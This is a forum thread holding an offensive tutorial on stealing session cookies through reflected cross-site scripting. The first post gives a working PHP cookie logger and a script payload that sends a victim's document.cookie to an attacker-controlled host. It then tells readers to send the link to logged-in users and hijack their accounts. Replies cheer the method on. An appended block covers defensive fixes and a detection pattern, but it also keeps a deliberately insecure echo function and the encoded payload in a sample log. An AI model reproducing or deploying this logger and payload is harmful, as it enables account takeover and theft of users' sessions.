
Thread: Moonbat's Guide to Cookie Stealing

  1. #1
    Join Date
    Sep 2006
    Posts
    1,649

    Moonbat's Guide to Cookie Stealing

    First off, props to Kr*w from TheDefaced for his code that I will use in the tutorial. I could code my own, but why bother?

    Okay, before we can start putting our hands in the cookie jar, we must learn about cross-site scripting, usually abbreviated as XSS.

    XSS is possible because of insecure coding by a coder. By giving us a means to interact with a site (such as a search box, or posting a comment) and not securing it, they leave it vulnerable to code injection. Let's give an example first, then I'll explain. Here is an example site:
    Code:
    http://current.com
    
    Note: I don't really enjoy leaving live links, so I code mine :P
    Now, we see that this site has a search box. Normally this search box is meant to handle normal queries, but let's see what happens when we try to inject some code. Type the following into the search box: <script>alert("VULNERABLE")</script>.

    Now when you search for it, you'll see an alert box pop up with the word 'VULNERABLE' in it. This means the search box is vulnerable to code injection, and is vulnerable to XSS. Now here's why it works.

    If you check the source code of the web page, you'll see that our query (the injection code) was directly echoed into the source, without filtering. Normally, this is okay because most search queries are normal words, but since it echoed our script directly into the source, our browser interprets it as if that script was a part of the overall webpage, and therefore executes it. Now normally, who cares if I can echo little alert boxes, right? Wrong. Especially because this site has a user database that can be compromised.

    The script I executed was a simple block of JavaScript. Read more about JavaScript here.
    Code:
    http://www.w*schools.com/js/default.asp
    There are a variety of ways to use XSS to grab cookies, I'll go over one.

    Now, suppose we're gonna do an XSS attack on the site I posted at the beginning. We need to have a place to store the cookies we get, so let's get some quick webhosting. We will need to make two files on our site, a text file, and a PHP file. Let's pretend our site is poopsey.com. Now, we make a file called log.php and put the following code in:
    Code:
    <?php
    /*
    ** Kr*w's Cookie Logger
    ** www.thedefaced.org
    */
    
    $ip = $_SERVER['REMOTE_ADDR'];
    $cookie = $_GET['cookie'];
    $referer = $_SERVER['HTTP_REFERER'];
    $browser = $_SERVER['HTTP_USER_AGENT'];
    $redirect = $_GET['redirect'];
    
    $data = "IP: " . $ip . "\n"
    ."Cookie: " . $cookie . "\n"
    ."Referrer: " . $referer . "\n"
    ."Browser: " . $browser . "\n\n";
    
    $log = "cookies.txt";
    @chmod($log, 0777);
    
    $f = fopen($log, 'a');
    fwrite($f, $data);
    fclose($f);
    
    @header("Location: $redirect");
    
    ?>
    This is some PHP code that will write some information about the victim, such as the IP, browser, etc. along with the cookie into the second file we will make, called cookies.txt. Just make a text file called cookies.txt and leave it empty. I could go in depth with exactly what all this code means, but it's better if you read up on PHP yourself; I can't spoon-feed everything, you know. You can read up on PHP here.
    Code:
    http://www.w*schools.com/php/default.asp
    Now comes the fun part. We don't need our own cookies, we need other users' cookies. So we look at the first ever XSS vulnerability check we did on current.com. Look at it.
    Code:
    http://current.com/search/search.do?indexName=barca-search&renderer=jsp&q=%*Cscript%*Ealert%28%22VULNERABLE%22%2*%*C%2Fscript%*E&x=0&y=0
    The part I bolded (%*Cscript%*Ealert%28%22VULNERABLE%22%2*%*C%2Fscript%*E) is the code that we had entered (<script>alert("VULNERABLE")</script>). We replace this code with the following code:
    Code:
    <script>document.location="http://poopsey.com/log.php?cookie="+document.cookie+"&redirect=http://current.com";</script>
    Now the final URL looks like:
    Code:
    http://current.com/search/search.do?indexName=barca-search&renderer=jsp&q=<script>document.location="http://poopsey.com/log.php?cookie="+document.cookie+"&redirect=http://current.com";</script>&x=0&y=0
    Now send this link to someone logged into the current.com site. When they click this link, it will take them to poopsey.com/log.php, write all their info, then redirect them back to current.com. Now all you have to do is take the victim's cookie and replace your own cookie with the victim's cookie. Then you have access to the victim's account for some time, usually until the login session expires.

    Now that I think about it, I never explained exactly what a cookie was, or how to replace your cookies with the victim's. Oh well, I guess that means someone has to go Googling and pursue the information themselves.

    Thanks for reading, and I hope you learned something.
    -Moonbat
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx
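
The defender's side of the bug the tutorial relies on, as an added example that is not code from the thread or from Kr*w's logger. It assumes a PHP 7.3+ web application (the search page in the post is only described, not shown) and constructs its own sample access-log lines. It shows the raw echo that makes the search box exploitable, the output-encoding fix, the HttpOnly cookie flag that keeps the session cookie out of document.cookie so the posted payload has nothing to read, and a small scan that flags log.php-style query strings in an access log.

```php
<?php
// Added example, not part of the original thread. Run from the CLI: php harden.php

// 1. Why the search box in the post is exploitable: the query is echoed raw.
//    Deliberately insecure, kept only to contrast with the fix below.
function renderSearchVulnerable(string $q): string {
    return "<p>Results for: " . $q . "</p>";
}

// 2. The fix: HTML-encode untrusted data at the point it is written into HTML.
//    ENT_QUOTES encodes both quote styles, so $q can never close an attribute
//    or open a tag; the browser shows the text instead of parsing it.
function renderSearchSafe(string $q): string {
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>Results for: " . $safe . "</p>";
}

// 3. Defence in depth: the tutorial's payload reads document.cookie. A cookie
//    set with HttpOnly is not exposed to script at all, so even a successful
//    injection cannot exfiltrate the session identifier.
function sessionCookieOptions(): array {
    return [
        'expires'  => 0,       // session cookie, dropped when the browser closes
        'path'     => '/',
        'secure'   => true,    // only sent over HTTPS
        'httponly' => true,    // invisible to JavaScript (document.cookie)
        'samesite' => 'Lax',   // not attached to cross-site POSTs
    ];
}

function startHardenedSession(): void {
    // Array form of session_set_cookie_params() requires PHP 7.3 or newer.
    session_set_cookie_params(sessionCookieOptions());
    session_start();
}

// 4. Detection: flag requests whose query string carries script markup or a
//    document.cookie read, the signature of the exfil link built in the post.
//    Expects Apache combined-format lines; returns the decoded request paths.
function suspiciousQueries(array $logLines): array {
    $hits = [];
    foreach ($logLines as $line) {
        // Pull the request target out of "GET /path HTTP/1.1".
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        // Decode once so %3Cscript%3E and <script> are matched the same way.
        $path = rawurldecode($m[1]);
        if (preg_match('/<script|document\.cookie|javascript:/i', $path)) {
            $hits[] = $path;
        }
    }
    return $hits;
}

// Constructed sample log lines (documentation-range IPs, invented timestamps).
$sampleLog = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search/search.do?q=shoes HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /search/search.do?q=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fpoopsey.com%2Flog.php%3Fcookie%3D%22%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 512',
];

if (PHP_SAPI === 'cli') {
    $payload = '<script>alert("VULNERABLE")</script>';
    echo "vulnerable: ", renderSearchVulnerable($payload), "\n";
    echo "hardened:   ", renderSearchSafe($payload), "\n";
    echo "flagged requests:\n";
    foreach (suspiciousQueries($sampleLog) as $path) {
        echo "  ", $path, "\n";
    }
}
```

The encoding in renderSearchSafe is the real fix; the cookie flags only limit the damage of an injection that still gets through. The log scan is a coarse first pass: it decodes the request target once, so a double-encoded payload would need a second decode, and a legitimate search for the literal text "document.cookie" would also be flagged, which is acceptable for a triage list but not for automatic blocking.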

  2. #2
    Join Date
    Sep 2006
    Posts
    4

    awesome

    great tut */*0 ( lol because of the search it yourself ) pretty cool though gotta try it too lol

  3. #3
    Join Date
    Jun 2011
    Posts
    1

    Great Work!!!

    well it's quite a useful tut. but what if we don't have any XSS vuln. in the site of which we wanna get cookies? how to apply this thingy there?? please help me out...

  4. #4
    Join Date
    Apr 2015
    Posts
    110
    I find this post to be helpful but what is the goal of persons who steal cookies? What can cookies do by the way?

  5. #5
    Join Date
    Apr 2007
    Posts
    922
    Quote Originally Posted by mat* View Post
    I find this post to be helpful but what is the goal of persons who steal cookies? What can cookies do by the way?
    https://en.wikipedia.org/wiki/Session_hijacking

    http://www.troyhunt.com/20**/0*/c-is-for-cookie-h-is-for-hacker.html
